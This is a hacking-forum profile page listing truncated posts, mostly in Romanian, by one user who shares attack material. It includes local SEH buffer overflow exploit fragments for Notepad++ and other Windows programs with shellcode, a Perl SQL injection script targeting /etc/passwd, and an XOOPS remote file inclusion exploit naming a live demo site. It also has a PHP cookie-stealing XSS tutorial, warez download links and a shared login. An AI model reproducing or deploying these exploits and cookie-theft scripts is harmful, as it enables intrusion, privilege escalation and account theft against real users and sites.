Jump to content

fl0 fl0w

Active Members
  • Content Count

    72
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by fl0 fl0w

  1. # Buffer overflow simplu cand deschizi un fisier .png special un SEH handler este suprascris, # apoi trebuie decat sa scot 8 bytes din stack,si RET instructiune ce imi pune ultimi 4 bytes # in EIP ,acesti 4 bytes o sa fie o instructiune JMP 10 bytes peste zona corrupta pe [nop] si apoi [shellcode]. # Video test 0day # Download phtst.rar Cod: cpp private pastebin - collaborative debugging tool
  2. Asta e important si pentru voi. /* ************************************************************** (0day)Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow POC* by fl0 fl0w * ************************************************************** */ /***************************************************************************************************** LATEST FIXES * Notepad++ v5.4.5 fixed bugs (from v5.4.4) :
  3. My new exploit . Pentru mai multe detalii privind debugging, am pus screenshoturi si altele http://rapidshare.com/files/279955517/Portable_E.M_Magic_Morph_1.95b_Buffer_Overflow.zip.html http://www.2shared.com/file/7794630/5e98eb46/Portable_EM_Magic_Morph_195b_Buffer_Overflow.html http://www.turboupload.com/2y6snh3b5fad/Portable_E.M_Magic_Morph_1.95b_Buffer_Overflow.zip.html Acest buffer overflow este 100% exploatabil rezultand in executie de cod pe un target capatand astfel drepturi de ADMIN pornind de la statusul de USER. Partea cea mai dificila este programarea shellcodului ,deoarece soft
  4. Salut bro's ,got 0F**gday /*0day HTML Email Creator & Sender v2.3 Local Buffer Overflow(Seh) Poc ******************************************************************** Debugging info Seh handler is overwriten , the offset is at 60 bytes in our buffer so you have to build your buffer as follows: [PONTER TO NEXT SEH]-------[SEH HANDLER]----[NOP]------[SHELLCODE] | | | | JMP 4 bytes POP POP RET 50*0x90 calc.exe ****************************************************************
  5. demo video http://www.filefactory.com/file/afg57be/n/orbit_test_avi http://www.sendspace.com/file/uyu8qi http://files.filefront.com/orbit+testavi/;13220935;/fileinfo.html #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #define SIZE 10000 #define OFFSET 504 void file (char * , char *); void write (char *, int ,char *); void print (); void usage (char *); void target (); /*tnx Metasploit for Shellcodes*/ //LAUNCH CALC.EXE char shellcode_1[] =
  6. Preview http://rapidshare.com/files/92994953/1.bmp.html DW http://www.pagegangster.com/shop/publications/view/15521/ Cere sa te autentifici ,logati-va cu datele astea sa o rasfoiti.. Username: flo_flow_supremacy Password: 4319 O colaborare in nr 4 fratilor.. DW link http://rapidshare.com/files/93400638/Co0de-Magazine-NR3.pdf.html
  7. #!/usr/bin/perl#You can get admin hash,or acces the pass file from the *NIx #with the generated strings with the generator.c program #you have to put in sql specific comands,my example is for #tables and *NIX pass #exploit tested on winxp sp2 # #include<stdio.h> # #include<stdlib.h> # #include<string.h> # int main() # { char st[1024]; # int le; # printf("Input : "); # gets(st); # for(le=0;le<strlen(st);le++) # { printf("%d,",st[le]); # } # system("pause"); # return 0; # } #101,116,99,47,112,97,115,115,119,100 = /etc/passwd #If we would do this : #http:/
  8. #!/usr/bin/perl sub header() { print q { ========================================================================= XOOPS modules xfsection 1.01 =>Remote File Inclusion Exploit Exploit Coded by fl0 fl0w flo_flow_supremacy[at]yahoo[dot]com PoC:http://site.com/modules/xfsection/modify.php?dir_module=evilShell? Demo:http://www.homu.net/modules/xfsection/modify.php?dir_module=SHELL? ========================================================================= } } sub routine() { header(); print q { ======================================================================
  9. EN Version. http://rapidshare.com/files/35582872/The_most_used_methods_to_penetrate_a_web_server_By_fl0_fl0w_.pdf.html
  10. Hacking'ul nu se poate defini ,hacking is a state of mind.Un hacker este o persoana care exploateaza fiecare detaliu a unui sistem de calcul si care prin programare inbunatateste codurile.
  11. Da ,da cum sa nu ..asa e .Probabil ai stat vreo 3 saptamani ca sa iti dai seama ..de cand l-am pus.
  12. Vrajeala ,nu ai facut nimic decat sa iti scoti limitarea de 80% de pe bandswitch care oricum era folosita in regim de 'urgenta'. Bullshit!
  13. Pentru a exploata un site vulnerabil trebuie sa injectezi scripturi pentru a culege user imput.Pentru cookiuri la fel trebuie sa folosesti un limbaj de scripting in primul rand ,logic si inainte sa testezi. Testezi cu un alert ,apoi treci la lucru. Faci o cerere GET catre locul unde sunt stocate : ['cookie'] ,copiezi intr-o variabila cea ce gasesti,apoi directionezi acel continut undeva. Faci o schema URL ,apoi si o postezi in forumul ,guesstbook'ul ,site'ul respectiv. Un astfel de script arata : O sa folosesc php. <?php $a=$_GET('cookie'); $b=fopen("cookies.txt","c"); fwri
  14. @Spy_bit pt ca am luat cu /vbulletin si nu trebuia ,am vazut dupa.Documenteaza-te despre anonimitate si navigare pe internet,servere proxy etc inainte sa intrebi chestii de genul asta.
  15. Am pus si active perl ,mplayer se vede cel mai bine. http://rapidshare.com/files/31089970/video_tutorial.fl0.fl0w.rar.html
  16. 1800 PHP Scripts http://rapidshare.com/files/22764424/1800_PHP_Scripts__Web_Developers_Mega_Pack_.part3.rar [url]http://rapidshare.com/files/22797158/1800_PHP_Scripts__Web_Developers_Mega_Pack_.part4.rar[/url] [url]http://rapidshare.com/files/23134305/1800_PHP_Scripts__Web_Developers_Mega_Pack_.part5.rar[/url] [url]http://rapidshare.com/files/23207667/1800_PHP_Scripts__Web_Developers_Mega_Pack_.part6.rar[/url]
  17. Geek House: 10 Hardware Hacking Projects for Around Home DOWNLOAD http://rapidshare.com/files/22814285/Geek_House.rar Password: pangieSF
  18. DOWNLOAD http://rapidshare.com/users/3JFXER Password: www.ddlnova.com
  19. GcMail is a very flexible Mailclient which offers a great variety of configuration options, yet is easy to use.GcMail is a program which is suitable for the casual user, as well as the “Power- User” in an office environment. Clear layout, ease of use and security were priorities in the development of the program. As far as security is concerned, GcMail excels. You can use the integrated GcMail encryption option, if the recipient also uses GcMail. Alternatively, you can encrypt your confidential messages with PGP. Unlimited number of user Unlimited number of accounts Extensive search Extensive
  20. fl0 fl0w

    Socket

    Un socket facut in perl. [url]http://rapidshare.com/files/31031102/socket.pl.html[/url]
  21. fl0 fl0w

    Geez people !

    De acord cu dizzy.
  22. Ceva facut de mine ,poate va ajuta. http://popesculescu.lx.ro
×
×
  • Create New...